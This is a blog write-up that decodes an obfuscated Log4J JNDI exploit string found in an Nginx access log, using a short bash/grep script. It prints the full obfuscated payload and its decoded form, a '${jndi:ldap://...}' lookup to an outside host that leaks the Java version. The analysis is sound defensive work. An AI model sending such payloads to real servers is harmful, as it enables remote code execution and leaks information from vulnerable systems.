khairulazam.net

Just my simple blog.

Analysis Write-Ups

Interesting Request – Log4J JNDI Exploit

By zam #analysis, #bash, #coding, #cygwin, #windows

Recently, I saw a person asking question on one of Telegram group that I’ve joined.

The person said that if anyone know what kind of request is this. The person give the questioned logs – saying that this is from Nginx log:

10.0.0.170 - - [07/Aug/2023:08:30:53 +0000] "GET /${${u:n1:9:-j}${lr9t:-n}${uh:9n:-d}${o3k:j:-i}${s:4w:-:}${q:-l}${awd:-d}${h76x:-a}${y:c:-p}${t5i8:jtf5:-:}${m9:v12:-/}${a:sl8k:hdm8:-/}${gj:r2lq:-P}${6:0:-A}${e58:s0:-l}${7zyk:c:-0}${cw:9et:ute:-c}${tf:79jg:--}${${3sfd:14r:-s}${plvu:-y}${f:-s}${bi0:3:-:}${n7du:vjn5:s9ur:-j}${7c9y:-a}${bgw:p2:0:-v}${wn1z:u8q:97b5:-a}${3r4:todc:-.}${oe3g:318:xt1:-v}${mxps:-e}${ie7:7:iv6:-r}${2yl0:x:28eh:-s}${grtd:zm9t:-i}${3j:-o}${6stx:f:-n}}${ifx:8x1b:-.}${9ot:4xbq:as:-1}${5yg:mj4l:-f}${0o:-7}${o5:-1}${y:8c:-8}${7l45:7vlp:hw:-e}${d3:uiqe:-d}${akg:6gc:n26:-c}${hvl:gud1:-f}${at5:9:-2}${e:-c}${u24c:-0}${obl:ps:n:-f}${iq:-9}${kf0:fa:-f}${ubg:ymae:m8a:-c}${e47q:-5}${zq:gnx:dp:-c}${p:-c}${6r:2je3:-f}${kja8:4wk:wy2t:-c}${8oz:n:-0}${rw:-6}${fr:-6}${zj:-b}${tki:-9}${1l5:-8}${6bw1:8p:9j51:-7}${irbs:-3}${32:i:-c}${h:8jxp:3p:-3}${m8:1:-c}${yp:p:yet:-3}${e:a:-3}${op:-8}${86:1:lf0:-f}${k:e:-d}${u:-9}${y9d:576:-0}${4:af:-e}${q:b5l:-2}${if5:-a}${wb6:ica:-.}${7n:-z}${8qch:kp2i:i1xh:-.}${mbix:hd:-7}${jod:4:-b}${z89:hrp:-a}${xdv:w:te:-e}${s:9e:-.}${fuz:uk2:y:-x}${j:tg:-y}${7:-z}} HTTP/1.1" 404 6622 "${${ao:-j}${8w:-n}${3:-d}${jwi:-i}${c:zcwm:tdvi:-:}${yme:-l}${hze:nkbo:-d}${oe3:8gp:-a}${s1:-p}${2:0:yxq:-:}${k:4g:-/}${7:-/}${bz:-R}${au02:ohx:-E}${7sv:-l}${vazk:-0}${i:-c}${vq:--}${${tde:o:-s}${0:n:kp:-y}${58q0:dkei:-s}${9:5:-:}${ya0:fpa:-j}${4:-a}${i:-v}${ro:tja:-a}${yw:oy:-.}${c8:-v}${ajk:dc:-e}${vqp6:-r}${jwk:e:2:-s}${pin1:-i}${t17:-o}${zlc5:xsm:xe:-n}}${2j:-.}${pu:q:-1}${awp:t:-f}${1f:-7}${e:q0:-1}${k:-8}${e:w9:-e}${nbxi:-d}${zmn5:-c}${n0o:qm:-f}${1qs:6ja7:-2}${pcs:5:-c}${jc:-0}${yg:-f}${r:-9}${qkz0:4dm:3:-f}${lpje:r:34:-c}${si7:-5}${c:nrq:-c}${l1:-c}${n:e24:a:-f}${sx3i:1wx:-c}${0:re:7:-0}${j8l:yv:y8:-6}${xcmy:m:xly6:-6}${xoug:y0t:lvd:-b}${7rl:ms:-9}${o3vj:h:w:-8}${tofq:1mky:1q:-7}${2j:tf:49if:-3}${8zj:q:1o:-c}${2anb:u4:-3}${y:-c}${rxz:2us:3r:-3}${fy1u:b1:-3}${o:3:-8}${e6:gy:9qj:-f}${8sc9:-d}${op:5d8q:p4v:-9}${fu:bza6:ljh:-0}${t1:q:-e}${pzsx:-2}${s81x:-a}${ht:7nja:1x:-.}${xd:1g:7k:-z}${bgt:g7b:pkj7:-.}${eiu8:k8m:-7}${ng:kbtm:4d0a:-b}${rh:8f42:-a}${v:8:5:-e}${mbv:cxyn:h9ko:-.}${sq32:-x}${pqe:-y}${8vt3:j:-z}}" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" "34.68.34.76"
Code language: Access log (accesslog)

I never saw this kind of request. Quick Googling also did not find any answers.

Further inspection of the request line, it seems like obfuscated – the request is using looks like Bash parameter expansion feature.

Let’s try to translate the line 1-by-1:

${u:n1:9:-j}
${lr9t:-n}
${uh:9n:-d}
${o3k:j:-i}

Which translate into:

jndi

So, lets create a script that extract value after colon “-:”

#!/bin/bash

# Your obfuscated string
string='${u:n1:9:-j}${lr9t:-n}${uh:9n:-d}${o3k:j:-i}${s:4w:-:}${q:-l}${awd:-d}${h76x:-a}${y:c:-p}${t5i8:jtf5:-:}${m9:v12:-/}${a:sl8k:hdm8:-/}${gj:r2lq:-P}${6:0:-A}${e58:s0:-l}${7zyk:c:-0}${cw:9et:ute:-c}${tf:79jg:--}${${3sfd:14r:-s}${plvu:-y}${f:-s}${bi0:3:-:}${n7du:vjn5:s9ur:-j}${7c9y:-a}${bgw:p2:0:-v}${wn1z:u8q:97b5:-a}${3r4:todc:-.}${oe3g:318:xt1:-v}${mxps:-e}${ie7:7:iv6:-r}${2yl0:x:28eh:-s}${grtd:zm9t:-i}${3j:-o}${6stx:f:-n}}${ifx:8x1b:-.}${9ot:4xbq:as:-1}${5yg:mj4l:-f}${0o:-7}${o5:-1}${y:8c:-8}${7l45:7vlp:hw:-e}${d3:uiqe:-d}${akg:6gc:n26:-c}${hvl:gud1:-f}${at5:9:-2}${e:-c}${u24c:-0}${obl:ps:n:-f}${iq:-9}${kf0:fa:-f}${ubg:ymae:m8a:-c}${e47q:-5}${zq:gnx:dp:-c}${p:-c}${6r:2je3:-f}${kja8:4wk:wy2t:-c}${8oz:n:-0}${rw:-6}${fr:-6}${zj:-b}${tki:-9}${1l5:-8}${6bw1:8p:9j51:-7}${irbs:-3}${32:i:-c}${h:8jxp:3p:-3}${m8:1:-c}${yp:p:yet:-3}${e:a:-3}${op:-8}${86:1:lf0:-f}${k:e:-d}${u:-9}${y9d:576:-0}${4:af:-e}${q:b5l:-2}${if5:-a}${wb6:ica:-.}${7n:-z}${8qch:kp2i:i1xh:-.}${mbix:hd:-7}${jod:4:-b}${z89:hrp:-a}${xdv:w:te:-e}${s:9e:-.}${fuz:uk2:y:-x}${j:tg:-y}${7:-z}'

# Use grep to match the pattern, then sed to extract the value after the colon
result=$(echo "$string" | grep -oP ':-\K[^}]+' | tr -d '\n')

echo "$result" # Outputs "jndi:l..."

Replace the “string” with the obfuscated string that we observed in the logs given.

Save the code & run it. Ta Daa! The output shown as below; seems related to Log4J JNDI exploitations:

10.0.0.170 - - [07/Aug/2023:08:30:53 +0000] "GET /${jndi:ldap://PAl0c-${sys:java.version}.1f718edcf2c0f9fc5ccfc066b9873c3c338fd90e2a.z.7bae.xyz} HTTP/1.1" 404 6622 "${jndi:ldap://REl0c-${sys:java.version}.1f718edcf2c0f9fc5ccfc066b9873c3c338fd90e2a.z.7bae.xyz}" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" "34.68.34.76"
Code language: Access log (accesslog)

By zam

Related Post

Analysis Write-Ups

Extracting Quarantine Files from Windows Defender

zam
Analysis Write-Ups

Decrypting QBot/QakBot Registry

zam
Analysis Write-Ups

Windows Credentials Manager – Looking for cached Zip Passwords

zam

Any Comments?

This site uses Akismet to reduce spam. Learn how your comment data is processed.